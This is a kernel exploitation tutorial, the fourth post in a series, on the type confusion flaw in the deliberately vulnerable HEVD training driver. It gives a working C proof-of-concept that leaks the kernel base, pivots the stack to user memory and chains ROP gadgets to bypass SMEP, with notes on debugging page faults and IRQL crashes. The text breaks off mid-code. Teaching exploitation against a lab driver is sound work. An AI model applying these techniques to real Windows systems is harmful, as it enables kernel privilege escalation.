Kernel Exploitation Primer 0x4 - Type Confusion & Use-After-Free Vulnerabilities
In the previous post, we walked through some of the mitigations implemented in Windows. Now let’s get started with exploiting some kernel driver vulnerabilities in HEVD.
Type Confusion Vulnerability
HEVD has a dedicated handler for the Type Confusion vulnerability, TypeConfusionIoctlHandler, whose IOCTL code is 0x222023.
Before getting into the vulnerability, let’s learn a bit about what type casting is.
Type casting in C/C++ is converting a variable from one data type to another. The purpose of type casting in C/C++ is to allow compatibility between different data types, enabling operations, comparisons, or assignments that wouldn't be allowed otherwise.
For example, you can cast an int to a float to perform precise mathematical calculations, or cast a void* to a specific pointer type to access its data.
There are different types of casting in C/C++. The classic C-style cast, which also works in C++:
int a = 10;
float b = (float)a; // C-style cast
This is the C++ static_cast form:
int a = 10;
float b = static_cast<float>(a); // C++ static_cast
The others are dynamic_cast, const_cast, and reinterpret_cast. Different casts are used for different scenarios, and they differ in what is checked at compile time or at runtime.
The C-style cast is not type-safe: the compiler accepts almost any conversion, including ones that static_cast would reject, so mistakes only surface at runtime as undefined behavior. static_cast is checked by the compiler, but nothing is verified at runtime, so an incorrect downcast still compiles and is still dangerous. dynamic_cast is checked at runtime (for polymorphic types), which makes it safer, but the check adds overhead, so it is used less often. reinterpret_cast simply reinterprets the bits and performs no checks at all.
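To make the difference between the casts concrete, here is a minimal sketch. The Shape, Circle, and Square types and the helper names are hypothetical and exist only for this illustration; the bit inspection uses memcpy because that is the well-defined way to look at raw bytes.

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical types for illustration only; they are not part of HEVD.
struct Shape { virtual ~Shape() = default; };
struct Circle : Shape { int radius = 7; };
struct Square : Shape { int side = 3; };

// dynamic_cast checks the real type at runtime and yields nullptr on a mismatch.
bool is_circle(Shape* s) {
    return dynamic_cast<Circle*>(s) != nullptr;
}

// static_cast from int to float is a value conversion checked at compile time.
float to_float(int value) {
    return static_cast<float>(value);
}

// Looking at the raw bits of a float performs no conversion at all.
// This assumes a 4-byte IEEE 754 float, which holds on mainstream platforms.
std::uint32_t float_bits(float value) {
    static_assert(sizeof(float) == sizeof(std::uint32_t), "assumes 4-byte float");
    std::uint32_t bits = 0;
    std::memcpy(&bits, &value, sizeof(bits));
    return bits;
}
```

Passing a Square to is_circle returns false instead of silently treating it as a Circle, which is the runtime check that a C-style cast or static_cast would not perform.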
Reference:
- https://stackoverflow.com/questions/1609163/what-is-the-difference-between-static-cast-and-c-style-casting
- https://www.youtube.com/watch?v=SIAuhzQqAow
- https://cwe.mitre.org/data/definitions/843.html
IDA Analysis
Things go wrong when a value is interpreted as the wrong type. Let’s get back to TypeConfusionIoctlHandler: this function calls TriggerTypeConfusion with the user input (IO_STACK_LOCATION→Parameters.DeviceIoControl.Type3InputBuffer == IrpSp+0x20).
The TriggerTypeConfusion function takes 1 argument, a pointer to the user input, which is a USER_TYPE_CONFUSION_OBJECT structure. This structure contains 2 members, ObjectID and ObjectType.
So the user input is a USER_TYPE_CONFUSION_OBJECT structure of 0x10 bytes, referred to as the UserTypeConfusionObject variable, which is then moved to the RBX register (1️⃣) [ RBX = UserTypeConfusionObject (USER_TYPE_CONFUSION_OBJECT) ].
Moving on, there is a call to the ExAllocatePoolWithTag() API (2️⃣), which allocates pool memory of the specified type and returns a pointer to the allocated block. Here it allocates 0x10 bytes of NonPagedPool, based on the arguments passed to it.
Interestingly, it casts the pointer (PVOID) returned by ExAllocatePoolWithTag to _KERNEL_TYPE_CONFUSION_OBJECT. In assembly you won’t see this cast; instead the returned address is simply copied into the PoolWithTag variable (mov r14, rax 3️⃣, where r14 is PoolWithTag 1️⃣, a _KERNEL_TYPE_CONFUSION_OBJECT structure) [ R14 = PoolWithTag (KERNEL_TYPE_CONFUSION_OBJECT) ].
In assembly, everything boils down to raw bits and bytes. The concept of "types" or “type casting” that we're familiar with from high-level languages (like int, float, char, etc.) simply doesn't exist at the assembly level.
Checking the _KERNEL_TYPE_CONFUSION_OBJECT structure, it contains 2 members: the first is ObjectID and the second is a union with 2 members, ObjectType and Callback.
Something to know about a union: all of its members share the same memory location, and the size of a union is determined by its largest member. In this case, both ObjectType and Callback are 8 bytes (on 64-bit systems), so they occupy the same 8 bytes.
Moving on, there are a few operations happening here. Let’s quickly recall the registers:
- RBX is the pointer to the user input UserTypeConfusionObject, which is an instance of the USER_TYPE_CONFUSION_OBJECT structure.
- R14 points to a memory region allocated using ExAllocatePoolWithTag(). This memory is cast to PoolWithTag, which is a KERNEL_TYPE_CONFUSION_OBJECT structure.
The operations are:
- 1️⃣ dereferences the RBX register, copying the first 8 bytes to the RAX register. According to USER_TYPE_CONFUSION_OBJECT (UserTypeConfusionObject), the first member is ObjectID, so RAX holds ObjectID.
- 2️⃣ the RAX value (which contains ObjectID) is copied to the address pointed to by R14, which is the newly allocated region. It is a KERNEL_TYPE_CONFUSION_OBJECT (PoolWithTag) structure, and its first 8 bytes are ObjectID as well. This means it copies UserTypeConfusionObject->ObjectID to PoolWithTag->ObjectID.
- 3️⃣ dereferences RBX+8, fetching the next 8 bytes of USER_TYPE_CONFUSION_OBJECT (the ObjectType member) into the RAX register.
- 4️⃣ the RAX value (now holding ObjectType) is copied to the address R14+8. This position in KERNEL_TYPE_CONFUSION_OBJECT is a union with two members. Here is the interesting part: both members of this union are 8 bytes, so the value can be read as either ObjectType or Callback.
typedef struct _USER_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
unsigned __int64 ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
union {
unsigned __int64 ObjectType;
void (*Callback);
};
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
Let’s look at how the union causes the type confusion here. As explained earlier, all members of a union share the same storage, and its size is determined by its largest member. Here is a quick example.
#include <stdio.h>
int main() {
char secret[10] = "1337";
union Data {
void* normalcall; // 8 bytes
void* maliciouscall; // 8 bytes
};
union Data data;
data.normalcall = &secret;
printf("Size of union: %zu bytes\n", sizeof(data)); // %zu is the correct specifier for size_t
printf("normalcall value: %p\n", data.normalcall);
printf("maliciouscall value: %p\n", data.maliciouscall);
}
- We define a union named Data with two members, normalcall and maliciouscall, both of which are pointers (void*), typically 8 bytes on a 64-bit system.
- A char array named secret is initialized with the string "1337".
- We assign the address of secret to data.normalcall. This means data.normalcall now points to the start of the secret array.
- We print the size of the union. Since both members are 8 bytes, the size of the union is 8 bytes, the size of its largest member.
- We print the value of data.normalcall, which shows the address of secret.
- We then print the value of data.maliciouscall. Even though we never explicitly assigned a value to maliciouscall, let’s see what we get.
By executing the binary,
- We get the size of the union, which is 8 bytes.
- Next, we see the address stored in normalcall, which is the address of secret. That seems correct.
- Then we print maliciouscall, and it prints the same address. This demonstrates that the members of the union share the same memory. Because of this shared memory, even if the application retrieves the address from maliciouscall, it is still the address stored in normalcall.
- This behavior applies regardless of differing data types; it depends on how the application or binary handles the data.
> .\binary.exe
Size of union: 8 bytes
normalcall value: 000000FC539EFCB0
maliciouscall value: 000000FC539EFCB0
In the example above, both members are 8 bytes (void*). However, consider a scenario where one member is an int (4 bytes) and the other is a void* (8 bytes). The overall size would still be 8 bytes, meaning it can hold up to 8 bytes of data. When I say it depends on how the application handles the data, I mean that if the program reads the int, it only takes the first 4 bytes. However, if it then uses the second member of the union, the void* (pointer), it interprets all 8 bytes that were stored. The application can still protect against this by verifying that the received data is only 4 bytes (for the int) and rejecting the input if 8 bytes were supplied for the second union member.
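The 4-byte versus 8-byte case can be sketched as follows. The Mixed union and the helper name are hypothetical, and the result shown in the note assumes a little-endian machine such as x64, where the first 4 bytes of storage hold the low half of the value.

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical union for illustration: a 4-byte member overlapping an 8-byte member.
union Mixed {
    std::uint32_t small;  // 4 bytes
    std::uint64_t wide;   // 8 bytes, stands in for a pointer-sized value
};

static_assert(sizeof(Mixed) == 8, "the union is as large as its largest member");

// Store 8 bytes through the wide member, then copy out only the first 4 bytes
// of the union's storage, which is what a reader of the 4-byte member would see.
std::uint32_t first_four_bytes(std::uint64_t value) {
    Mixed m;
    m.wide = value;
    std::uint32_t low = 0;
    std::memcpy(&low, &m, sizeof(low));
    return low;
}
```

On a little-endian system, storing 0x1122334455667788 and reading the first 4 bytes yields 0x55667788; the upper half is still sitting in the union for any code that later reads the 8-byte member.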
Back to IDA: there is a call to TypeConfusionObjectInitializer (2️⃣), and before that call (1️⃣) there is a mov that copies the R14 register into RCX, which IDA labels UserTypeConfusionObject. As seen above, R14 is PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT), so this structure is passed as the argument to TypeConfusionObjectInitializer.
TypeConfusionObjectInitializer
- 1️⃣ defines that RCX (the input _KERNEL_TYPE_CONFUSION_OBJECT) is treated as KernelTypeConfusionObject.
- 2️⃣ KernelTypeConfusionObject is copied to the RBX register.
- 3️⃣ it then dereferences RBX+8, which is the 2nd member (the union), and calls that value.
We already know that _KERNEL_TYPE_CONFUSION_OBJECT holds 2 members: ObjectID and a union (ObjectType & Callback). If you look at the source code of this function, it makes a call to the Callback member.
typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
union {
unsigned __int64 ObjectType;
void (*Callback);
};
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
We know that the ObjectType of the user input (USER_TYPE_CONFUSION_OBJECT) is copied to the ObjectType of _KERNEL_TYPE_CONFUSION_OBJECT. Since it is a member of the union, it shares the same memory with Callback. As a result, when the call occurs, it actually invokes the value we sent in ObjectType.
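The flow analyzed above can be reproduced in a small user-mode sketch. The struct names mirror the driver's structures, but everything here is a simulation under my own assumptions: nothing talks to the driver, attacker_target is a harmless stand-in, and the callback is read back with memcpy so the example stays well-defined C++.

```cpp
#include <cstdint>
#include <cstring>

// User-mode sketch only: names mirror the structures above.
struct UserObject {
    std::uintptr_t ObjectID;
    std::uintptr_t ObjectType;
};

using CallbackFn = int (*)();
static_assert(sizeof(CallbackFn) == sizeof(std::uintptr_t),
              "assumes function pointers are pointer-sized");

struct KernelObject {
    std::uintptr_t ObjectID;
    union {
        std::uintptr_t ObjectType;
        CallbackFn Callback;
    };
};

// Stand-in for attacker-chosen code; it only returns a marker value.
int attacker_target() { return 0x1337; }

// Mirrors the copy in TriggerTypeConfusion followed by the call in
// TypeConfusionObjectInitializer: ObjectType is written, then the same
// 8 bytes are used as a function pointer.
int trigger(const UserObject& user) {
    KernelObject kernel{};
    kernel.ObjectID = user.ObjectID;
    kernel.ObjectType = user.ObjectType;

    // Read the bytes that Callback occupies. memcpy is used instead of
    // reading kernel.Callback directly, which is formally undefined in C++.
    CallbackFn cb = nullptr;
    std::memcpy(&cb, &kernel.ObjectType, sizeof(cb));
    return cb();
}
```

Filling ObjectType with the address of attacker_target and calling trigger returns 0x1337: the integer supplied by the caller was executed as a function pointer.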
Exploitation
Let’s test this theory. I wrote the following code, where I created a structure called _MY_USER_INPUT; this is what we are going to send to the driver. It contains 2 members, which I assigned dummy values for now: ObjectID contains 0x4141414141414141 and ObjectType contains 0x4242424242424242.
#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
typedef struct _MY_USER_INPUT {
void* ObjectID;
void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;
int main()
{
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
_MY_USER_INPUT input;
input.ObjectID = (LPVOID)(0x4141414141414141);
input.ObjectType = (LPVOID)(0x4242424242424242); // Callback
printf("[+] Calling TYPE_CONFUSION_VULN....");
BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
hDriver,
TYPE_CONFUSION_VULN,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
return 0;
}
Since we know the IOCTL code that invokes TypeConfusionIoctlHandler, I used an online decoder to get the rest of the information (the raw IOCTL code can be used directly as well).
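The decoding step can also be done by hand. The sketch below splits a control code into its fields following the bit layout of the CTL_CODE macro; the struct and function names are my own.

```cpp
#include <cstdint>

// Fields of a Windows I/O control code, following the CTL_CODE bit layout:
// DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]
struct IoctlFields {
    std::uint32_t device_type;
    std::uint32_t access;
    std::uint32_t function;
    std::uint32_t method;
};

constexpr IoctlFields decode_ioctl(std::uint32_t code) {
    return IoctlFields{
        (code >> 16) & 0xFFFF,  // device type
        (code >> 14) & 0x3,     // required access
        (code >> 2) & 0xFFF,    // function number
        code & 0x3,             // transfer method
    };
}
```

For 0x222023 this gives device type 0x22 (FILE_DEVICE_UNKNOWN), access 0 (FILE_ANY_ACCESS), function 0x808, and method 3 (METHOD_NEITHER). METHOD_NEITHER is why the handler reads the user pointer straight from Type3InputBuffer.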
I placed a breakpoint on the call to TriggerTypeConfusion, since our user-mode application reaches it through this IOCTL anyway.
I ran the user-mode application on the debuggee machine and the breakpoint was hit. RCX contains the pointer to the structure I sent.
Moving on, after the call to the ExAllocatePoolWithTag() API, it copies the user input (RBX) to the newly allocated region (R14), PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT).
Next comes the call to TypeConfusionObjectInitializer, which takes the pointer to _KERNEL_TYPE_CONFUSION_OBJECT as its argument.
Moving on, we reach the call to [RBX+8], which is the second member of _KERNEL_TYPE_CONFUSION_OBJECT, the Callback function pointer (union). This means the function will call whatever pointer we place in the ObjectType field.
Now that we know our attack path, we can try to execute our shellcode. However, SMEP is enabled, so we can’t simply allocate a user-mode region using VirtualAlloc() and provide that address as ObjectType; SMEP will block that. We can try to disable it like before, but we can only provide a single ROP gadget through ObjectType.
So with the right gadget, we can pivot the stack to user mode and build a fake stack there that holds the rest of the ROP gadgets to disable SMEP. HVCI is disabled for this scenario.
I found this gadget using ROPGadget; the address 0x83000000 is within user space (from 0 to 0x000007FFFFFEFFFF).
0x000000014059f24e : mov esp, 0x83000000 ; ret
I updated the POC. We need to bypass kASLR as well, so I reused the same getbaseaddress() that I used in my previous posts. I used VirtualAlloc() to allocate the region (fake stack); since we know the address the stack will be pivoted to (0x83000000), I used that as the starting address (lpAddress) for VirtualAlloc().
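The address arithmetic behind the gadget can be sketched as follows. It assumes the address printed by the gadget tool is relative to a preferred image base of 0x140000000, which matches the offset 0x0059f24e used in the POC; the function names are hypothetical.

```cpp
#include <cstdint>

// Assumption: the tool-reported gadget address is relative to the image's
// preferred base, taken here as 0x140000000.
constexpr std::uint64_t kPreferredBase = 0x140000000ULL;

// Convert a tool-reported address into an offset (RVA) from the image base.
constexpr std::uint64_t to_rva(std::uint64_t reported) {
    return reported - kPreferredBase;
}

// Rebase the RVA onto the base address leaked at runtime.
constexpr std::uint64_t rebase(std::uint64_t runtime_base, std::uint64_t rva) {
    return runtime_base + rva;
}

// A 32-bit register write such as "mov esp, imm32" zero-extends into the full
// 64-bit register, so RSP ends up holding exactly the 32-bit immediate.
constexpr std::uint64_t rsp_after_pivot(std::uint32_t imm32) {
    return static_cast<std::uint64_t>(imm32);
}
```

The zero-extension is what makes this gadget usable as a pivot: after it runs, RSP is 0x0000000083000000, an address user mode can allocate in advance.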
#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>
typedef struct _MY_USER_INPUT {
void* ObjectID;
void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;
PVOID getbaseaddress()
{
BOOL status;
LPVOID* pImageBase;
DWORD ImageSize;
status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
LPVOID ntaddr = pImageBase[0];
return ntaddr;
}
int main()
{
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
LPVOID nt_addr = getbaseaddress();
printf("[+] Nt base address: %p\n", nt_addr);
_MY_USER_INPUT input;
input.ObjectID = (LPVOID)(0x4141414141414141);
input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT), 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
getchar();
printf("[+] Calling TYPE_CONFUSION_VULN....");
BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
hDriver,
TYPE_CONFUSION_VULN,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
return 0;
}
I placed a breakpoint on the call to Callback, and when it attempted to execute our stack pivot gadget, it ended up in an error:
Error 1: EXCEPTION_DOUBLE_FAULT
Analyzing the error, it’s an UNEXPECTED_KERNEL_MODE_TRAP and the first parameter (Arg1) shows 0x8, which is EXCEPTION_DOUBLE_FAULT. The third parameter (Arg3) shows the address 0x83000000, where the error occurred.
After some googling and reading the documentation and the work of other researchers, I figured the following might have happened:
- Once the stack pivot is performed, the kernel driver tries to access the user-mode address 0x83000000, and since this allocated region is empty (no data has been written into this 0x1000-byte region), it might be paged out (paged-out memory has been temporarily moved from RAM to disk to free up space for active processes).
- So when the driver tries to access 0x83000000, the MMU (memory management unit) walks the page tables to find the PTE (Page Table Entry) and the physical address, and since the page is paged out, the CPU raises an exception called a page fault. In our scenario this is the first fault.
- Usually, to handle the page fault, the current execution context (including registers and the program counter) is saved to a structure called a trap frame (_KTRAP_FRAME) on the stack. In our scenario it couldn’t be saved, so a second fault occurred. This is the reason for the EXCEPTION_DOUBLE_FAULT.
Using the !pte command on the virtual address shows zeros, which most likely means the region is paged out, and the page fault occurred to page this region in.
According to the documentation for this double fault, it might have occurred because the kernel tried to work in an unmapped region:
The first cause is a kernel stack overflow. This overflow occurs when a guard page is hit, and the kernel tries to push a trap frame. Because there's no stack left, a stack overflow results, causing the double fault.
Let’s analyze this further. I added getchar() before calling DeviceIoControl() and opened the user-mode application in VMMap.
Using VirtualAlloc() we allocated 0x1000 bytes starting at 0x83000000. Windows does not manage memory in bytes; it works with pages (4KB), so even a small request is backed by a whole page. In addition, VirtualAlloc() reserves address space at a 64KB allocation granularity for efficient memory management and system performance.
This is a simple representation of what’s going on here. I believe this is what might have happened: the kernel tried to access 0x83000000, which was paged out, so a page fault occurred and the CPU tried to save the trap frame on the stack. Since the stack grows downwards and the pivot address sits at the very start of the allocated page, everything below it is unmapped, so the EXCEPTION_DOUBLE_FAULT error occurred.
The reason I say this might be the cause is that there is something else to consider: the Interrupt Request Level (IRQL). If the code is running at a high IRQL and tries to page in a user-space address, that also leads to a BSOD. More about this is covered under Error 2 below.
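The "stack grows into unmapped memory" part of this theory is simple page arithmetic, sketched below with hypothetical helper names and the 4KB page size mentioned above.

```cpp
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;  // 4KB pages

// Base address of the page that contains addr.
constexpr std::uint64_t page_base(std::uint64_t addr) {
    return addr & ~(kPageSize - 1);
}

// True when addr falls inside the half-open range [base, base + size).
constexpr bool in_region(std::uint64_t addr, std::uint64_t base, std::uint64_t size) {
    return addr >= base && addr < base + size;
}

// Address written by the first 8-byte push after RSP is set to rsp.
constexpr std::uint64_t first_push_target(std::uint64_t rsp) {
    return rsp - 8;
}
```

With RSP at 0x83000000, the first push writes to 0x82FFFFF8, which belongs to the page at 0x82FFF000. That page lies outside the 0x1000-byte region requested at 0x83000000, so any push after the pivot touches memory the POC never asked for.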
To solve this issue, we can try the following:
- We need to allocate some memory before the stack pivot address (0x83000000) for the trap frame or other kernel operations. Because we pivoted the stack to user space and the kernel keeps using the stack, it’s better to include this region in our fake stack.
- We need to make sure the allocated region is always paged in. We can try this using VirtualLock(), and we can also write some data into the region to make sure it is paged in, but a user-space address cannot be guaranteed to stay paged in.
This is the updated POC:
- Added a page of 0x1000 (4KB) before the fake stack and increased the total allocated region to 0x5000.
- Used VirtualLock() to page in the memory region and filled the whole allocated region with A’s (later I overwrite some of them with ROP gadgets).
- After the pivot it lands on my ROP gadgets, which are just NOP; RET, to see whether the gadgets execute successfully.
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x5000)) {
printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x5000);
int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
Back at the Callback pointer, I checked the allocated region; this time it’s paged in, and I can see the 3 ROP gadgets too.
Even though everything seems good, when I try to execute the ROP gadget that pivots the stack, it ends up in the same EXCEPTION_DOUBLE_FAULT again.
Not only that, the allocated region (< 0x83000000) above the stack pivot address (0x83000000) appears to be paged out.
Memory management is a complex topic. I read a few other researchers’ articles (referenced below) and this is my theory of what’s going on here: since I allocated a fairly small region of 0x5000 (20KB), even though the VirtualLock() call succeeded, the pages are not guaranteed to stay resident. There are scenarios where the memory is silently paged out (like what’s going on here). So I increased the region to 0x10000 (64KB). As I explained earlier, Windows works with pages, and VirtualAlloc() uses an allocation granularity that is typically 64KB.
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x10000)) {
printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x10000);
int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
After compiling and running the new POC, I could see the allocated region (< 0x83000000) above the pivot address filled with the assigned A’s. Following that, the ROP gadget that pivots the stack executed successfully.
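One detail that may also play a role here, offered as an assumption rather than something verified on this setup: the VirtualAlloc() documentation states that an address passed with MEM_RESERVE is rounded down to the allocation granularity. If the returned fakeStack pointer was rounded down this way, then VirtualLock() and memset() start from the rounded address, not from STACK_PIVOT - 0x1000. The sketch below, with hypothetical helper names and an assumed 64KB granularity, computes which range those calls would cover for both sizes.

```cpp
#include <cstdint>

constexpr std::uint64_t kGranularity = 0x10000;  // assumed 64KB allocation granularity

// Round addr down to a multiple of align (align must be a power of two).
constexpr std::uint64_t round_down(std::uint64_t addr, std::uint64_t align) {
    return addr & ~(align - 1);
}

// End of the range covered by memset(fakeStack, ..., length), assuming
// fakeStack is the requested address rounded down to the granularity.
constexpr std::uint64_t touched_end(std::uint64_t requested, std::uint64_t length) {
    return round_down(requested, kGranularity) + length;
}
```

Under that assumption, the 0x5000 variant would fill 0x82FF0000 to 0x82FF5000 and never touch the page directly below the pivot, while the 0x10000 variant would fill everything up to 0x83000000. The value printed by the "Allocated region" line shows whether this rounding took place.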
Error 2: IRQL_NOT_LESS_OR_EQUAL
Now that the stack pivot was successful (it reached the ret instruction, which it didn’t previously), it should execute the other ROP gadgets (NOP; RET) from the stack, but that’s not the case.
It ended up in IRQL_NOT_LESS_OR_EQUAL. This error occurs only after the stack pivot, when it tries to execute my other ROP gadgets.
Arg1 shows the address that couldn’t be accessed and led to the issue. Arg2 shows the IRQL as 0xFF, and the analysis output itself states (highlighted) that an attempt was made to access a paged-out or invalid memory region at too high an IRQL.
Let’s have a brief explanation about Interrupt Request Level (IRQL):
In Windows, there is a concept called interrupts. An interrupt is a signal from hardware or software indicating an event that needs immediate attention. It temporarily halts the current code execution, allowing the interrupt handler (a specific routine) to execute. Once the interrupt is handled, the processor resumes the previous task.
The Interrupt Request Level (IRQL) determines the priority of interrupts and is a per-CPU value. There are different IRQLs (the numeric values for the higher levels below are the x86 ones; x64 uses the range 0 to 15, with HIGH_LEVEL at 15):
- PASSIVE_LEVEL (0) - Normal user-mode/kernel-mode execution.
- APC_LEVEL (1) - Asynchronous Procedure Calls.
- DISPATCH_LEVEL (2) - Thread scheduling, DPCs.
- DIRQL (3-26) - Device interrupts.
- POWER_LEVEL (30) - Power failure handling.
- HIGH_LEVEL (31) - Used for critical system operations.
Here is a quick example:
- When you press a key on the keyboard, the keyboard controller sends an interrupt signal to the CPU.
- Let’s say a processor is running a regular task at a low IRQL (e.g., IRQL = 0, PASSIVE_LEVEL).
- The keyboard interrupt is assigned a higher IRQL (a device IRQL, DIRQL, which is above DISPATCH_LEVEL).
- The CPU temporarily pauses the low IRQL task, processes the keyboard interrupt, and then resumes the previously interrupted task once the interrupt handling is complete.
The most notable points we need in this situation are:
- At Low IRQLs (PASSIVE_LEVEL): The system can handle page faults because it can pause the current thread, fetch the required page from disk, and then resume execution.
- At High IRQLs (DISPATCH_LEVEL and above): The system cannot handle page faults because paging operations (disk I/O) will take time. Since high IRQL levels must be serviced immediately and cannot wait for such operations, it could result in a crash (bug check).
Now with that in mind, after some analysis, following is my understanding:
Scenario 1:
- Initially, the driver operates at an IRQL below DISPATCH_LEVEL. However, when we interact with this specific IOCTL, under certain conditions the IRQL may be raised above DISPATCH_LEVEL. This escalation ensures that other processors halt their operations, allowing this task to proceed.
- During this high-IRQL operation, the driver attempts to access the ROP gadgets located in user-space memory (0x83000000). Even though we tried to lock the memory regions using VirtualLock to prevent paging, as I said earlier there is no guarantee that these pages remain resident in memory at all times.
- According to MSDN: When you lock memory with VirtualLock it locks the memory into your process's working set. It doesn't mean that the memory will never be paged out. It just means that the memory won't be paged out as long as there is a thread executing in your process, because a process's working set needs be present in memory only when the process is actually executing.
- So if the memory is paged out and a page fault occurs, the system cannot handle the page fault at this elevated IRQL. Consequently, this leads to an IRQL_NOT_LESS_OR_EQUAL error, as the system is unable to resolve the page fault while operating at a high IRQL.
I have 2 virtual processors in my machine and, as you can see in this scenario, the IRQL was raised to 13, which caused the IRQL_NOT_LESS_OR_EQUAL error.
Scenario 2:
- However, the above scenario is not consistent. There are some instances where the exploit works successfully. This might be because the processor accesses the ROP gadgets while the IRQL remains at a lower level. In this scenario, even if the memory is initially paged out, the system can page it back in without any issues, as the lower IRQL allows the page fault to be handled appropriately. As a result, the exploit executes successfully without triggering an IRQL_NOT_LESS_OR_EQUAL error.
As you can see in this scenario, the IRQL didn’t change and the ROP gadgets executed successfully:
The results may vary depending on the hardware configuration of different machines. Systems with more RAM and additional processors may experience a higher success rate. In such cases the IRQL might not need to be raised as often, and the system can handle tasks more smoothly.
User mode cannot control the page-in process. Even if you use VirtualLock or other user-mode methods, the memory may or may not be paged in; it depends on the system's load. To summarize:
- If the allocated memory is paged-in (stored in physical memory), everything works fine.
- If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is higher, it cannot handle the page fault, leading to failure.
- If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is lower, the memory can be paged-in successfully.
If we avoid scenario 1, the exploit works fine. This depends on the machine’s load and its efficiency.
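The three outcomes listed above can be written down as a tiny decision function. This is only a model of the rule described in this section; the enum and function names are hypothetical and nothing here queries a real system.

```cpp
#include <cstdint>

// IRQL values that matter for the paging decision.
constexpr std::uint8_t kPassiveLevel = 0;
constexpr std::uint8_t kApcLevel = 1;
constexpr std::uint8_t kDispatchLevel = 2;

enum class Outcome { RunsDirectly, PagedInThenRuns, BugCheck };

// Models what happens when kernel code touches a pageable user-mode address.
Outcome access_user_page(bool resident, std::uint8_t irql) {
    if (resident) {
        return Outcome::RunsDirectly;      // no page fault at all
    }
    if (irql < kDispatchLevel) {
        return Outcome::PagedInThenRuns;   // the fault can be serviced
    }
    return Outcome::BugCheck;              // IRQL_NOT_LESS_OR_EQUAL
}
```

The IRQL of 13 seen in scenario 1 combined with a non-resident page lands in the BugCheck branch, while the same page at kPassiveLevel or kApcLevel is simply paged in.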
For the POC below, I used the same ROP gadgets that I used to bypass SMEP & VBS in an earlier post (HVCI is disabled).
Let’s start from the beginning. After the stack pivot, the ROP chain begins executing and the fake stack frame looks good. It performs the same operations to bypass SMEP & VBS: it finds the PTE of the shellcode, flips the “U” flag to “K”, and executes the shellcode.
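The arithmetic that the ROP chain performs on the PTE can be checked in isolation. The first function repeats the calculation of the MiGetPte helper from the POC; the sample PTE value in the note is hypothetical, and the bit position of the U/S flag (bit 2) is the standard x64 page table layout.

```cpp
#include <cstdint>

// Same arithmetic as the MiGetPte helper in the POC: shift the virtual
// address right by 9 and mask to an 8-byte-aligned offset into the PTE array.
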